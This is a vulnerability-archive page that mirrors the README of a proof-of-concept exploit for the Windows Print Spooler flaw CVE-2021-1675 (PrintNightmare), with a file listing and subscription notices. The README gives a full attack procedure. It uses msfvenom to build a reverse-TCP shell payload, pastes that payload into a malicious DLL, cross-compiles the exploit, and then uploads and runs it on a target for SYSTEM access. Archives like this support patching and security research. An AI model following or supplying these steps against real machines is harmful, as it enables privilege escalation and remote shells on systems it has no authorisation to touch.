Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-1675 PoC — Windows Print Spooler Remote Code Execution Vulnerability

Source
https://github.com/AndrewTrube/CVE-2021-1675
Associated Vulnerability
Title:Windows Print Spooler Remote Code Execution Vulnerability (CVE-2021-1675)
Description:Windows Print Spooler Remote Code Execution Vulnerability
Description
PrintNightmare Local Privilege Escalation
Readme
# PrintNightmare Local Privilege Escalation PoC 

 src/nightmare.cpp: source code to exploit CVE-2021-1675 and gain system access
                    by installing a malicious dll                   
 src/payload-dll.cpp: source code for dll with malicious shellcode in entry function
 
 **!!Only use against servers on which you have permission to test**
 
## Summary
CVE-2021-1675 is a vulnerability in the Print Spooler Service of Microsoft Windows
which allows an attacker to bypass the SeLoadDriverPrivilege check. This can be
leveraged to gain privilege escalation on the target machine by installing a 
malicious DLL which calls shellcode or uses the Window API to establish a reverse
shell connection. Versions of Windows 10/8/Server 2008/Server 2012 before June
8th, 2021 are affected.

## POC
1. Download or clone git repo
2. Use msfvenom to generate a suitable payload in c
   `$ msfvenom -p windows/shell/reverse_tcp EXITFUNC=THREAD LHOST=127.0.0.1 LPORT=4444 -f c`
3. Paste the output of msfvenom into payload-dll.cpp where it says to 'change me'
4. Compile the main executable
   `x86_64-w64-mingw32-g++-win32 -o ./src/nightmare.o -c -g -Wall ./src/nightmare.cpp`
   `x86_64-w64-mingw32-g++-win32 -o ./bin/PrintNightmareLPE.exe ./src/nightmare.o -lws2_32 -static-libgcc -static-libstdc++ -lole32 -lwinspool`
5. Compile the dll
   `x86_64-w64-mingw32-g++ src/payload-dll.cpp -lws2_32 -o lib/evil.dll -shared`
6. Archive the exe and dll, then find a way to upload the archive to your target machine
   `zip ./bin/PrinterNightmareLPE.exe ./lib/ `
7. Once the archive is on the target Windows machine, extract it
8. Move evil.dll to c:\windows\temp\evil.dll
9. Run the PrintNightmareLPE.exe

## Notes
* If everything is working properly the exploit should iterate through the Windows' printer drivers and print out the results
* You can change the filepath PrintNightmareLPE.exe loads the evil.dll from inside the source code
* currently the malicous dll just loads calc.exe as Proof-of-Concept
File Snapshot

 [4.0K]  /data/pocs/3336423e9a7099b4c5cc970b8f115237a5c2350a
├── [4.0K]  bin
│   └── [2.3M]  PrintNightmareLPE.exe
├── [4.0K]  lib
│   └── [ 91K]  evil.dll
├── [2.0K]  README.md
└── [4.0K]  src
    ├── [4.9K]  nightmare.cpp
    ├── [ 25K]  nightmare.o
    ├── [1.6K]  payload-dll.cpp
    └── [ 571]  template-offensive-dll.cpp

3 directories, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →